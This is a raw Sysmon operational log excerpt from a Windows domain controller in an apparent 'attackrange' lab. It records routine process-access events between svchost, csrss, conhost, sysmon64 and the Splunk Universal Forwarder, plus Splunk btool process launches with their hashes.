13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5800-00000000A301}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E5B-6005-5700-00000000A301}37283104C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E5B-6005-5800-00000000A301}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.311{59A5CD1D-8E5B-6005-5800-00000000A301}3896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E5B-6005-5600-00000000A301}37363760C:\Windows\system32\cmd.exe{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.304{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 